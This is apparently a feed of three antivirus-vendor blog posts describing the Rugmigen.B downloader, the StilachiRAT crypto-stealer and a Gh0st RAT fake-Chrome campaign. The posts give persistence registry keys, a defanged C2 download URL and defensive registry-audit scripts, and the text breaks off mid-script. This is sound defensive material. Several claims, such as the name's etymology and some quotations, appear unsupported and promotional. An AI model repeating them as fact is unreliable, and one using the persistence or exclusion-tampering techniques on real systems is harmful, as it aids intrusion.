RAT – Gridinsoft Blog (https://gridinsoft.com/blogs)

Behavior:Win32/Rugmigen.B
https://gridinsoft.com/blogs/behavior-win32-rugmigen-b/
Tue, 25 Mar 2025 13:41:32 +0000

Behavior:Win32/Rugmigen.B – Complete Detection and Removal Guide

Behavior:Win32/Rugmigen.B Summary

Threat Name: Behavior:Win32/Rugmigen.B
Type: Behavioral Detection (Trojan Downloader/Infostealer)
Detection Method: Heuristic Analysis by Microsoft Defender
Affected Systems: Windows 7, 8, 10, 11
Risk Level: High
Main Symptoms: Continuous “Threat Blocked” notifications, system slowdowns, unauthorized registry modifications, unusual network connections
Distribution Methods: Malvertising, fake browser updates, compromised software, Discord CDN
Primary Payload: Infostealers (Lumma Stealer, Vidar, RecordBreaker, Rescoms)

What is Behavior:Win32/Rugmigen.B?

Behavior:Win32/Rugmigen.B is a detection name used by Windows Defender to flag suspicious activity. It commonly delivers infostealers, targeting sensitive data such as login credentials. It can lead to data theft, system compromise, and performance degradation through activities like cryptomining. In this post, we will take a detailed look at what this threat is as well as how to remove it.

[Chart: Behavior:Win32/Rugmigen.B Detection Trends (2023-2024), Daily Rugmigen.B Detections (Q4 2023 – Q1 2024); x-axis Sep 2023 to Jan 2024, y-axis 0 to 400 detections per day]

Source: Microsoft Security Intelligence, detection data compiled from Q3 2023 to Q1 2024

Behavior:Win32/Rugmigen.B Overview

Behavior:Win32/Rugmigen.B is a detection name used by Windows Defender. It has featured in recent user reports from people who experienced continuous “Threat Blocked” notifications. These notifications, recurring every 4-5 minutes, indicate that the antivirus (most likely Windows Defender) is actively blocking the threat each time it runs. The “Behavior” prefix marks a behavioral detection: the software identified suspicious activity rather than matching a specific file signature.

According to Microsoft’s security research, Windows Defender uses heuristic analysis to detect Rugmigen variants, monitoring for specific patterns of suspicious behavior rather than relying on traditional virus signatures. This approach is particularly effective against evolving threats that frequently change their code to evade detection, similar to how Trojan:Script/Phonzy.B!ml and other modern malware operate.

[Image: Behavior:Win32/Rugmigen.B detection notification in Windows Defender]

Behavior:Win32/Rugmigen.B is a detection name for a variant of the Rugmi malware family. Rugmi is classified as a Trojan downloader, a type of malware designed to fetch and install additional malicious software onto the infected system. This family has been extensively documented in cybersecurity reports, with significant activity noted in late 2023 and early 2024; by recent accounts its detection rates have surged to hundreds per day.

Technical Details

Rugmi, and by extension Behavior:Win32/Rugmigen.B, operates with a sophisticated structure comprising three distinct components. The Downloader is responsible for fetching an encrypted payload, often from remote servers, which enhances its ability to evade detection. The Internal Loader executes the payload using internal resources, allowing it to run without relying on external files initially. The External Loader runs the payload from an external file on the disk, providing flexibility in deployment.

[Image: Behavior:Win32/Rugmigen.B name meaning and components]

These components enable Rugmi to act as a loader for various infostealers, including Lumma Stealer, Vidar, RecordBreaker (also known as Raccoon Stealer V2), and Rescoms. Infostealers are particularly dangerous as they can extract sensitive information such as login credentials, browsing history, and cryptocurrency wallet details.

Key Technical Characteristics

Based on Microsoft’s security analysis and user reports, Behavior:Win32/Rugmigen.B exhibits these technical characteristics:

  • Process Injection Techniques: The malware injects malicious code into legitimate Windows processes to evade detection and gain system privileges.
  • Anti-Analysis Capabilities: It employs techniques to detect and evade analysis environments, including virtual machines and debugging tools.
  • Encrypted Communication: Communication with command and control servers is encrypted to avoid network-based detection.
  • File System Manipulation: Creates, modifies, or deletes files in system directories without proper authorization.
  • Registry Modifications: Makes unauthorized changes to the Windows registry, particularly to autorun keys that ensure persistence after system reboots.

The behavior detected under Win32/Rugmigen.B includes unauthorized system alterations, such as the appearance of unfamiliar files, changes in system settings, and attempts to disable security software. User reports indicate persistent issues even after system restores, similar to problems seen with DWM.exe issues and other system process manipulations.

Common File Locations

Behavior:Win32/Rugmigen.B typically creates or modifies files in these locations:

  • %TEMP% directory with random filenames
  • %APPDATA%\Microsoft\Windows\ with legitimate-looking names
  • %LOCALAPPDATA%\Temp\ with executable files disguised as system components
  • C:\ProgramData\ with hidden directories containing payload files

Registry Modifications

The malware typically modifies these registry keys to maintain persistence:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

Distribution and Prevalence

The distribution methods for Rugmi, and thus Behavior:Win32/Rugmigen.B, are diverse. Common vectors include malvertising, where malicious advertisements trick users into downloading infected files, and fake browser updates that pose as legitimate updates to exploit user trust. It also spreads through compromised software, infecting installations of popular programs like VLC media player or OpenAI ChatGPT. Additionally, it leverages Discord’s content delivery network to host and disseminate malware, taking advantage of the platform’s widespread use, similar to techniques used by Advanced Window Manager and other adware threats.

Recent telemetry data, as reported in cybersecurity analyses, shows a significant increase in detections, with spikes noted in October and November 2023, escalating to hundreds per day. This surge indicates active campaigns by threat actors, often operating under a Malware-as-a-Service (MaaS) model, where Rugmi is sold on a subscription basis to other malicious actors, with prices ranging from $250 per month for basic access to $20,000 for source-code rights.

Impact and Risks

The impact of Behavior:Win32/Rugmigen.B and related Rugmi variants is substantial, affecting both individual users and potentially organizational systems. Key risks include data theft, as infostealers deployed by Rugmi can extract usernames, passwords, and financial information, leading to identity theft or financial loss.

The malware also compromises systems by providing remote access to attackers, enabling further exploitation or ransomware deployment. Additionally, its malicious activities, such as cryptocurrency mining, can degrade system performance, as noted in some removal guides. For example, recent forum posts, dated March 19, 2025, highlight user experiences with Behavior:Win32/Rugmigen.B. Users reported continuous notifications, with attempts at system restores failing to resolve the issue.

Key Risks of Behavior:Win32/Rugmigen.B Infection

  • Data Theft: Credentials, financial information, and personal data can be stolen
  • Identity Theft: Stolen data can be used for identity fraud
  • Financial Loss: Direct theft from financial accounts or cryptocurrency wallets
  • System Damage: Core system files may be modified or corrupted
  • Performance Degradation: System resources used for cryptomining
  • Additional Malware: Acts as a gateway for other malicious software

How to Remove Behavior:Win32/Rugmigen.B

Automatic Removal with GridinSoft Anti-Malware

For the most effective and straightforward removal process, we recommend using specialized anti-malware software. GridinSoft Anti-Malware is specifically designed to detect and remove modern threats like those that trigger the Behavior:Win32/Rugmigen.B detection.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. You can adjust the action the program takes for each element: click "Advanced mode" and use the drop-down menus. You can also see extended information about each detection: malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are many detections. Do not interrupt it, and your system will come out as clean as new.

Removal finished

Manual Removal Steps

If you prefer to remove the threat manually, follow these steps carefully. Note that manual removal can be complex and may not remove all components of the threat:

  1. Boot into Safe Mode: Restart your computer and press F8 during startup to enter Safe Mode with Networking.
  2. End malicious processes: Open Task Manager (Ctrl+Shift+Esc), go to the Processes tab, and look for suspicious processes. Right-click on any suspicious process and select “End Task.”
  3. Remove startup entries:
    • Press Win+R, type “msconfig” and press Enter.
    • Go to the “Startup” tab and disable any suspicious entries.
    • Alternatively, open Task Manager, go to the Startup tab, and disable suspicious items.
  4. Delete suspicious files:
    • Check these common locations for malicious files:
      • %TEMP% folder (Win+R, type %TEMP% and press Enter)
      • %APPDATA% folder (Win+R, type %APPDATA% and press Enter)
      • %LOCALAPPDATA% folder (Win+R, type %LOCALAPPDATA% and press Enter)
    • Look for recently added files with random names or suspicious extensions.
  5. Clean the Registry:
    • Press Win+R, type “regedit” and press Enter.
    • Navigate to and check these locations for suspicious entries:
      • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
      • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
      • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
    • If you find suspicious entries, right-click and delete them.
  6. Reset your browsers:
    • For Google Chrome: Settings → Advanced → Reset and clean up → Restore settings to their original defaults.
    • For Mozilla Firefox: Help (?) → Troubleshooting Information → Refresh Firefox.
    • For Microsoft Edge: Settings → Reset settings → Restore settings to their default values.
  7. Update and run your antivirus program: Update your installed security software and perform a full system scan.
  8. Restart your computer in normal mode after completing all steps.
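The file locations and registry keys listed above, and steps 4 and 5 of the manual procedure, can be checked offline against a `reg export` of the relevant keys. The following is an added example, not the guide's or GridinSoft's code: it parses a .reg export and flags autorun entries launched from the drop directories named above, a Startup folder redirected via Shell Folders, and Policies\System values that disable Task Manager or Regedit. The sample .reg content, the value names and the user profile `C:\Users\alice` are constructed.

```python
"""Offline triage of a Regedit/`reg export` (.reg) fragment against the persistence
locations this guide lists. SAMPLE_REG is constructed sample data: the key paths and
drop directories come from the guide, the value names and file names are made up."""
import re
from typing import Dict, List

CV = "\\Software\\Microsoft\\Windows\\CurrentVersion\\"
AUTORUN_KEYS = {(h + CV + s).lower() for h in ("HKEY_CURRENT_USER", "HKEY_LOCAL_MACHINE")
                for s in ("Run", "RunOnce")}
SHELL_FOLDERS = ("HKEY_CURRENT_USER" + CV + "Explorer\\Shell Folders").lower()
POLICIES_SYSTEM = ("HKEY_CURRENT_USER" + CV + "Policies\\System").lower()
# Genuine Windows binary names; a copy outside C:\Windows is "disguised as a system component".
SYSTEM_BINARY_NAMES = {"svchost.exe", "dwm.exe", "explorer.exe", "csrss.exe", "lsass.exe"}
# Regedit writes [key path] headers, then "name"="string" or "name"=dword:... lines.
KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"WinUpdate"="C:\\Users\\alice\\AppData\\Local\\Temp\\svchost.exe"
"Helper"="\"C:\\ProgramData\\.cache\\loader.exe\" -s"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Cleanup"="C:\\Windows\\System32\\cmd.exe /c del C:\\Users\\alice\\AppData\\Local\\Temp\\x.tmp"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup"="C:\\ProgramData\\.cache"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
'''


def _unescape(s: str) -> str:
    r"""Undo .reg string escaping: \\ -> \ and \" -> " inside quoted data."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """{key_path: {value_name: data}}; REG_SZ is unquoted and unescaped, dword:/hex: kept verbatim."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = "" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
            data = m.group(2)
            if data.startswith('"') and data.endswith('"'):
                data = _unescape(data[1:-1])
            keys[current][name] = data
    return keys


def image_path(command: str) -> str:
    """Executable path from an autorun command line: the quoted part if present, else the
    first token ending in an executable/script extension; arguments are ignored."""
    cmd = command.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    m = re.match(r"(.+?\.(?:exe|com|bat|cmd|scr|vbs|js|ps1))(?:\s|$)", cmd, re.IGNORECASE)
    return m.group(1) if m else cmd.split(" ", 1)[0]


def audit(text: str, profile: str) -> List[str]:
    """One finding per suspicious entry, for the given user profile dir (e.g. C:\\Users\\alice)."""
    local, roaming = profile + "\\AppData\\Local\\", profile + "\\AppData\\Roaming\\"
    drop_dirs = [(local + "Temp\\", "%TEMP% / %LOCALAPPDATA%\\Temp"),
                 (roaming + "Microsoft\\Windows\\", "%APPDATA%\\Microsoft\\Windows"),
                 ("C:\\ProgramData\\", "C:\\ProgramData")]
    default_startup = (roaming + "Microsoft\\Windows\\Start Menu\\Programs\\Startup").lower()
    findings: List[str] = []
    for key, values in parse_reg_export(text).items():
        k = key.lower()
        if k in AUTORUN_KEYS:
            for name, cmd in values.items():
                path = image_path(cmd)
                p = path.lower()
                for d, label in drop_dirs:
                    if p.startswith(d.lower()):
                        findings.append(f"{key}\\{name}: runs from {label}: {path}")
                if p.rsplit("\\", 1)[-1] in SYSTEM_BINARY_NAMES and not p.startswith("c:\\windows\\"):
                    findings.append(f"{key}\\{name}: system binary name outside C:\\Windows: {path}")
        elif k == SHELL_FOLDERS:   # Startup folder redirected = anything dropped there autostarts
            startup = values.get("Startup", "")
            if startup and startup.lower() != default_startup:
                findings.append(f"{key}\\Startup redirected to {startup}")
        elif k == POLICIES_SYSTEM:  # policy values malware sets to hinder manual removal
            for name in ("DisableTaskMgr", "DisableRegistryTools"):
                if values.get(name, "").lower() == "dword:00000001":
                    findings.append(f"{key}\\{name}=1: Task Manager/Regedit disabled by policy")
    return findings
```

Run `audit(SAMPLE_REG, "C:\\Users\\alice")` to see the five findings; note that the RunOnce cleanup entry is not flagged, because only the image path is classified, not the arguments.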

How To Stay Safe?

To address Behavior:Win32/Rugmigen.B and prevent future infections, users are advised to take these steps:

  1. Use reputable antivirus software: Keep security software like GridinSoft Anti-Malware updated with the latest definitions and run regular scans.
  2. Avoid suspicious downloads: Do not download software from untrusted sources, especially torrents and free software bundlers.
  3. Be cautious with email attachments: Never open attachments from unknown senders or unexpected emails.
  4. Keep your system updated: Regularly update Windows and all installed software to patch security vulnerabilities.
  5. Enable Windows Defender: Ensure Windows Security features are enabled, including real-time protection and cloud-delivered protection.
  6. Be wary of browser notifications: Do not accept browser notifications from unknown or suspicious websites.
  7. Use an ad blocker: Install a reputable ad blocker to prevent malicious ads that can lead to infection.
  8. Implement proper backup strategies: Regularly back up important data to an external device or cloud storage service.

Frequently Asked Questions About Behavior:Win32/Rugmigen.B

Why does Windows Defender keep detecting Behavior:Win32/Rugmigen.B repeatedly?

Repeated detections indicate that the malware is trying to maintain persistence on your system. Windows Defender may be blocking individual attempts, but the root cause remains. This happens because the malware has established multiple persistence mechanisms or is being reinstalled by another malicious component. A thorough system scan with specialized anti-malware software is recommended to completely remove all components.

Is Behavior:Win32/Rugmigen.B a false positive?

While behavioral detections can occasionally result in false positives, Behavior:Win32/Rugmigen.B is usually a legitimate detection of suspicious activity. If you believe it’s a false positive, you can submit the flagged file to Microsoft for analysis or check if the program comes from a trusted source. However, it’s generally safer to treat the detection as legitimate and take appropriate action.

Can Behavior:Win32/Rugmigen.B steal my passwords?

Yes, programs triggering this detection often have information-stealing capabilities. They may collect passwords, financial details, browsing history, and other sensitive data. Rugmigen.B typically delivers infostealers like Lumma Stealer, Vidar, and RecordBreaker, which are specifically designed to harvest login credentials, cryptocurrency wallet information, and other sensitive data.

Why couldn’t Windows Defender automatically remove the threat?

Microsoft Defender may detect the behavior but sometimes cannot fully remove complex threats for several reasons: the malware might use advanced persistence techniques, have components that are currently in use by the system, or employ anti-removal mechanisms. In such cases, specialized anti-malware tools like GridinSoft Anti-Malware can provide more thorough removal capabilities.

How did my computer get infected with Behavior:Win32/Rugmigen.B?

Common infection vectors include downloading software from untrusted sources, clicking on malicious advertisements, opening infected email attachments, visiting compromised websites, or installing browser extensions with hidden malicious functionality. Rugmigen is also known to spread through fake software updates, compromised software installations, and through Discord’s content delivery network.

Conclusion

Behavior:Win32/Rugmigen.B represents a serious security threat that primarily functions as a downloader for various infostealers. When this detection appears in Windows Defender, it indicates that suspicious behavioral patterns associated with the Rugmi malware family have been identified on your system.

The most effective approach is to use specialized anti-malware software like GridinSoft Anti-Malware to thoroughly scan and clean your system. This ensures all components of the threat are removed, preventing reinfection and protecting your sensitive information.

By following the prevention tips outlined in this guide and maintaining good security practices, you can significantly reduce the risk of future infections and keep your digital life secure.

StilachiRAT: The Emerging Crypto-Stealing Malware Threat
https://gridinsoft.com/blogs/stilachirat-crypto-stealer/
Thu, 20 Mar 2025 08:25:31 +0000

$34.6 million in cryptocurrency could be at risk from StilachiRAT, a complex remote access trojan first detected by Microsoft Incident Response in November 2024. Unlike conventional ransomware that announces its presence, this digital threat operates silently in the background, monitoring user activities until it identifies the perfect moment to drain cryptocurrency wallets. According to Microsoft’s detailed analysis published in March 2025, once installed, it becomes nearly impossible to remove without specialized tools due to its advanced persistence mechanisms.

The name “Stilachi” comes from Italian for “spike,” combined with RAT (Remote Access Trojan) – reflecting its sharp, piercing ability to penetrate security defenses. As Bitdefender reported on March 18, 2025, what makes this threat particularly concerning is its “impressive arsenal of malicious capabilities” and its laser-focused targeting of cryptocurrency wallets.

How StilachiRAT Works: Technical Analysis

According to Microsoft’s Security Blog, StilachiRAT isn’t just another generic malware variant. It was built specifically to hunt down cryptocurrency wallets. Microsoft Security Intelligence’s investigation revealed a consistent pattern across infected systems – cryptoassets vanish without a trace, often before victims realize they’ve been compromised.

[Chart: StilachiRAT Key Threat Capabilities: Crypto Wallet Theft 95%, Clipboard Monitoring 87%, RDP Session Hijacking 83%, Credential Theft 69%, Anti-Forensics 61%, System Reconnaissance 52%]

Source: Based on Microsoft Security Intelligence StilachiRAT capability analysis

Security researchers who investigated the malware described it as “the malware equivalent of trying to remove superglue with your bare hands,” highlighting both its effectiveness and the difficulty in eliminating it once it has infected a system.

Target List: Wallets in StilachiRAT’s Crosshairs

According to Quorum Cyber’s threat intelligence report, StilachiRAT doesn’t discriminate between blockchain ecosystems. It specifically targets 20 different cryptocurrency wallet extensions used in the Google Chrome browser, including:

  • MetaMask
  • Coinbase Wallet
  • Trust Wallet
  • BNB Chain Wallet
  • Bitget Wallet
  • Braavos – Starknet Wallet
  • Compass Wallet for Sei
  • ConfluxPortal
  • Fractal Wallet
  • Keplr
  • Leap Cosmos Wallet
  • Manta Wallet
  • OKX Wallet
  • Phantom
  • Plug
  • Sui Wallet
  • Station Wallet
  • TokenPocket
  • TronLink
  • Solflare

While documented cases of theft attributed specifically to StilachiRAT remain limited due to its recent emergence, the potential impact on cryptocurrency holders is significant. As Microsoft noted, the malware can capture wallet addresses, private keys, and other sensitive information that allows attackers to access and steal digital assets stored in these wallets.

Anatomy of the Threat: How StilachiRAT Operates

Initial Reconnaissance

When StilachiRAT first infiltrates a system, it immediately begins mapping the digital environment. According to Microsoft’s analysis, it performs comprehensive system reconnaissance that includes:

  • Inventorying all hardware IDs and BIOS serial numbers
  • Checking for webcams and microphones (potentially for future spying)
  • Mapping installed applications, with special focus on financial software
  • Creating a unique tracking ID to mark the system in attacker databases

This intelligence-gathering creates a complete profile of the target system, helping attackers identify high-value targets worth focusing on. As Quorum Cyber notes, the malware appears to prioritize systems based on potential cryptocurrency value.

[Image: Technical analysis showing StilachiRAT scanning a system for wallet information]

Credential Theft Mechanism

Microsoft’s security team discovered that StilachiRAT uses an ingenious technique to breach Google Chrome’s security:

The malware locates Chrome’s master “encryption_key” file in the user directory, decrypts this key using built-in Windows functions, uses the master key to unlock the saved passwords vault, and extracts every stored credential in seconds.

The speed and efficiency of this attack means that by the time users realize what’s happening, their cryptocurrency accounts may have already been compromised.

Cryptocurrency Extraction Engine

According to Bitdefender’s analysis, the core malicious functionality in StilachiRAT is contained in a component called WWStartupCtrl64.dll. This module is specifically engineered for cryptocurrency theft:

It systematically scans the registry for installed wallet extensions, extracts wallet configuration files containing encryption keys, searches for backup seed phrases stored in text files or screenshots, and transmits private keys to attackers in real-time.

Unlike basic malware that causes system slowdowns, StilachiRAT operates with remarkable stealth. Microsoft noted that victims often only discover the theft days later when checking their wallet balances.

[Image: Samples of counterfeit wallet extensions containing StilachiRAT code identified by researchers]

Self-Healing Persistence Mechanism

What makes StilachiRAT particularly difficult to remove is its intricate self-healing capability. As detailed in Bitdefender’s report:

“The malware can be launched either as a standalone component or a Windows service. Regardless of its form, the malware uses a watchdog thread that regularly checks if the RAT’s executable or dynamic link library (DLL) files are present on the system. If the components are not found, the malware recreates them using an internal copy generated during the initialization phase.”

Microsoft security engineers noted that the malware can maintain backup copies in unexpected locations, reinstall itself within seconds of removal attempts, and create multiple registry startup entries as fallbacks.

Identity Impersonation

StilachiRAT goes beyond data theft by enabling attackers to impersonate legitimate users. According to Quorum Cyber’s analysis, the malware:

  • Identifies active Remote Desktop Protocol (RDP) sessions
  • Clones security tokens and privileges
  • Launches applications using the compromised identity
  • Can move through corporate networks as an authorized user, bypassing standard security checks by using legitimate credentials

This capability makes it particularly dangerous in enterprise environments where it can exploit trusted connections to access sensitive systems and cryptocurrency exchange accounts.

Clipboard Monitoring

Microsoft’s analysis confirmed that StilachiRAT constantly monitors clipboard contents for valuable data:

It captures clipboard contents at high frequency, uses pattern matching to identify wallet addresses, passwords and private keys, can trigger immediate theft operations when it detects valuable data, and operates with minimal performance impact to avoid detection.

This clipboard monitoring capability is particularly effective against cryptocurrency users who frequently copy and paste wallet addresses or seed phrases, unaware that the malware is intercepting this sensitive information.

Advanced Evasion Techniques

StilachiRAT employs various methods to avoid detection, as detailed by multiple security firms:

It regularly erases Windows Event Logs to cover its tracks (particularly logs with Event IDs 1102 and 104), detects virtual machines and sandbox environments used by security researchers, changes its code signature to evade antivirus detection, and uses encrypted communication that mimics normal HTTPS traffic.

Command and Control Infrastructure

According to Quorum Cyber, the malware maintains contact with its operators through a well-designed two-channel system:

“The malware communicates with a command-and-control (C2) server using domain names that are intentionally scrambled or disguised, and instead of using standard IP address formats, the malware encodes IP addresses in a binary format.”

It utilizes common ports (53, 443, 16000) to blend with normal traffic and accepts remote commands that can control virtually every aspect of the infected system. This connection allows attackers to manually take control when high-value targets are identified.

Distribution Methods

While Microsoft has not definitively determined how StilachiRAT is initially delivered, security researchers have identified several potential infection vectors:

Fake wallet extensions: Counterfeit versions of legitimate cryptocurrency wallet extensions that look identical to the real ones.

Phishing campaigns: Emails and messages claiming to be from cryptocurrency exchanges offering “security updates” or “verification requirements.”

Compromised downloads: Modified installers for legitimate software that secretly bundle the malware.

Cracked software: Pirated applications and activation tools containing trojan payloads.

According to Ken Colburn’s analysis in AZ Central, “It doesn’t matter what browser you’re using if you open the wrong file or click the wrong link” – highlighting that StilachiRAT’s delivery methods target user behavior rather than specific technical vulnerabilities.

Effective Protection Against StilachiRAT

Standard antivirus protection may not be sufficient against this evolving threat. Security experts recommend a multi-layered approach:

  1. Verify wallet extensions thoroughly: Only install from official web stores after carefully verifying the developer, review count, and installation numbers.
  2. Use hardware wallets: Keep significant cryptocurrency holdings in cold storage devices like Ledger or Trezor that never connect directly to the internet.
  3. Implement browser security features: As Ken Colburn notes in AZ Central, “Edge combined with Windows Defender SmartScreen can reduce your exposure to malicious websites and risky downloads,” though third-party security solutions offer more comprehensive protection regardless of browser choice.
  4. Enable application control: Use Windows features to restrict execution to known, trusted software.
  5. Monitor event logs: Be vigilant for cleared logs, especially Event IDs 1102 and 104, which may indicate anti-forensic activity.
  6. Deploy specialized security software: According to Bitdefender, “Dedicated software like Bitdefender Ultimate Security can keep your devices clean of RATs, viruses, worms, zero-day exploits, ransomware, spyware, rootkits and other digital threats.”
  7. Isolate cryptocurrency activities: Consider using a dedicated device exclusively for cryptocurrency transactions, separated from everyday browsing.
  8. Perform regular security audits: Scheduled checks for unusual services and registry entries can help detect compromise early.

StilachiRAT Removal Procedure

If you suspect infection, immediate action is critical:

Advanced User Removal Process

Be aware that StilachiRAT actively resists removal attempts. According to Microsoft’s analysis, the malware’s self-healing capabilities make manual removal exceptionally challenging. If you have the technical expertise:

  1. Disconnect from the internet immediately
  2. Boot into Safe Mode with Networking (press F8 during startup)
  3. Open Task Manager (Ctrl+Shift+Esc) and terminate suspicious processes
  4. Check Services console for unfamiliar services, especially those with randomized names
  5. Remove suspicious browser extensions from Chrome
  6. Use Registry Editor to search for and remove startup entries
  7. Run multiple security tools to verify complete removal

Important warning: StilachiRAT’s self-repair mechanisms make manual removal extremely difficult. Missing even a single component can result in complete reinfection within minutes.

Recommended Solution: Specialized Removal

For most users, dedicated anti-malware software is the most effective option. GridinSoft Anti-Malware provides a specific removal protocol for StilachiRAT that targets all components simultaneously. This approach:

  • Neutralizes the malware’s self-repair mechanism before beginning removal
  • Identifies and eliminates all components in a coordinated operation
  • Thoroughly cleans infected browser profiles and extensions
  • Restores security settings modified by the malware

Click the banner below to download GridinSoft Anti-Malware and follow the installation prompts to remove StilachiRAT from your system.


Recovery Prospects After Cryptocurrency Theft

The reality of cryptocurrency theft presents significant challenges for recovery:

Unlike traditional financial fraud where banks can reverse transactions, blockchain transactions are fundamentally irreversible by design. When private keys are compromised, attackers can authorize transfers that cannot be undone by any central authority.

However, there are limited scenarios where recovery might be possible:

  1. Exchange intervention: If stolen funds were transferred to a regulated cryptocurrency exchange, immediate reporting with transaction IDs and wallet addresses may allow the exchange’s security team to freeze assets.
  2. Law enforcement: The FBI’s Cyber Division and similar agencies have developed capabilities for tracking cryptocurrency crime, with several successful recovery cases documented.
  3. Blockchain analytics: Companies specializing in cryptocurrency tracing may help identify exchange deposit points where funds could potentially be recovered.

For any chance of recovery, document these details immediately:

  • The exact time theft was discovered
  • Transaction IDs of unauthorized transfers
  • Destination wallet addresses
  • Any evidence regarding how the system was compromised

Timing is critical – successful recovery cases typically involve reporting within hours of the theft, before funds can be laundered through multiple wallets.

The Emerging Threat Landscape

StilachiRAT represents an evolution in cryptocurrency-targeting malware. As noted by Bitdefender, while it has only been “spotted in the wild a few times” as of March 2025, its advanced capabilities make it a significant concern for cryptocurrency holders.

According to Microsoft’s security team, “What makes this threat different is its focus. It’s not trying to infect millions of computers—it’s hunting specifically for crypto holders and executing perfect heists. One successful infection can yield more profit than thousands of traditional ransomware victims.”

For cryptocurrency users, the implications are clear: securing digital assets requires specialized security measures beyond standard practices. As Ken Colburn noted in AZ Central, “This malware warning is a serious reminder of the threats we all face, but it’s not a browser-specific flaw — it’s a wake-up call for users who aren’t taking security seriously.”

Protection begins with awareness and requires ongoing vigilance. The most effective defense combines secure hardware wallets, isolated computing environments, and specialized security tools designed to counter the specific techniques used by cryptocurrency-targeting malware like StilachiRAT.

Stay informed and protected – the security of your cryptocurrency depends on it.

The post StilachiRAT: The Emerging Crypto-Stealing Malware Threat appeared first on Gridinsoft Blog.

Gh0st RAT Malware Attacks Chinese Users Via Fake Chrome Page
https://gridinsoft.com/blogs/ghost-rat-attacks-chinese-users/
Mon, 29 Jul 2024 20:38:38 +0000

The post Gh0st RAT Malware Attacks Chinese Users Via Fake Chrome Page appeared first on Gridinsoft Blog.

Attackers are using a new loader, Gh0stGambit, to spread Gh0st RAT malware to Chinese users. A Google Chrome phishing download site is being used for that purpose, copying the design of the genuine page. That is, in fact, the part of the campaign that attracted the attention of cybersecurity experts.

Gh0st RAT Trojan Targets Chinese Windows Users

In early June, cybersecurity researchers discovered a malicious campaign targeting users from China. Threat actors are spreading Gh0st RAT using the malware dropper Gh0stGambit, which reaches user devices through the phishing site chrome-web[.]com. The attackers employed a drive-by download: they offered users a Google Chrome installer on a page that looked like the legitimate Chrome download site. However, the MSI installer downloaded from the fake site contains two files: the legitimate Chrome installation executable and the malicious installer WindowsProgram.msi, which executes the shellcode responsible for downloading Gh0stGambit.

Fake Chrome download page (Source: eSentire)

Gh0st RAT is a long-standing piece of malware from the arsenal of APT27; its source code was made publicly available in 2008. According to sources, its command infrastructure was primarily based in the People’s Republic of China. Written in C++, it has appeared in various forms over the years, primarily in campaigns organized by China-linked cyber espionage groups. Researchers report that a modified variant of Gh0st RAT was used in campaigns by this hacker group in 2018.

Some Details

The attack itself unfolds in several stages. Before carrying out its primary task, Gh0stGambit checks the system for anti-malware software, such as Microsoft Defender or 360 SafeGuard. If it detects these programs, it adds its own folder to their exclusions. It then connects to a command and control server at hxxp://pplilv.bond/d4/107.148.73[.]225/reg32 and downloads Gh0st RAT.
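A defender-side check for the exclusion tampering described above, added here as an example and not code from the article, from eSentire or from Gridinsoft. The Defender registry key names are the real ones; the `reg query` sample output and the flagged paths are constructed.

```python
r"""Review Microsoft Defender exclusions for entries a dropper would add.

Added example for this post, not code from the article, from eSentire or
from Gridinsoft. Gh0stGambit, as described above, adds its own folder to
the exclusions of the security product it finds. Defender stores path and
process exclusions as registry values under
HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths and \Processes.
This script parses the text that `reg query` prints for those keys and
flags exclusions pointing into user-writable locations. The sample output
below is constructed for the example; reading the live keys needs an
elevated prompt on current Windows builds.
"""
import re
import subprocess
import sys

EXCLUSION_KEYS = (
    r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths",
    r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes",
)
# Locations an unprivileged process can write to: an exclusion here lets
# anything dropped there run unscanned.
USER_WRITABLE = re.compile(
    r"^(?:[a-z]:\\users\\[^\\]+\\(?:appdata|downloads|desktop|documents)"
    r"|[a-z]:\\programdata|[a-z]:\\temp|[a-z]:\\windows\\temp)",
    re.I,
)
# One value line of `reg query`: name, type and data separated by runs of spaces
VALUE_LINE = re.compile(r"^\s{2,}(?P<name>.+?)\s{2,}REG_(?P<type>\w+)\s{2,}(?P<data>.*)$")


def parse_reg_query(text):
    """Yield (key, value name, data) tuples from `reg query` output."""
    key = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):      # unindented lines are key paths
            key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            yield key, m.group("name"), m.group("data")


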